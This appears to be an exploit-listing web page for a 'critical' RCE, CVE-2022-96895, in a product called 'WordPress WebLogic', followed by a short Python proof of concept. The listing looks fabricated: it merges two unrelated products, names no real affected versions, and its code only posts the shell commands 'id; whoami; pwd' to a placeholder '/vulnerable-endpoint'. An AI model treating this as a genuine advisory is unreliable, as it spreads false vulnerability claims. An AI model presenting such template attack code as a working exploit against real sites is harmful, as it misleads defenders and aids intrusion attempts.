Critical Severity CVE-2022-96895
Published: Jun 28, 2025

WordPress WebLogic - Rce

Rce
Type
9.9
CVSS Score
4
Views
Anonymous
Author

Description

This exploit targets a rce vulnerability in WordPress WebLogic.

The vulnerability allows an attacker to:
- Execute arbitrary code remotely
- Gain system-level access
- Install malware or backdoors

This vulnerability has been assigned CVE-2022-96895 with a CVSS score of 9.9.

Affected Systems

WordPress WebLogic versions prior to latest security update

Proof of Concept

Security Warning

This code is provided for educational and research purposes only. Do not use against systems you do not own or have explicit permission to test.

Exploit Code
#!/usr/bin/env python3
import requests
import sys

def exploit_rce(target_url):
    """
    Remote Code Execution Exploit
    Educational purposes only - do not use against systems you do not own
    """
    payload = {
        "cmd": "id; whoami; pwd",
        "action": "execute"
    }
    
    try:
        response = requests.post(f"{target_url}/vulnerable-endpoint", data=payload)
        if response.status_code == 200:
            print("[+] Command executed successfully:")
            print(response.text)
        else:
            print("[-] Exploit failed")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 exploit.py <target_url>")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_rce(target)
Community Rating
0

Login to rate this exploit

Quick Actions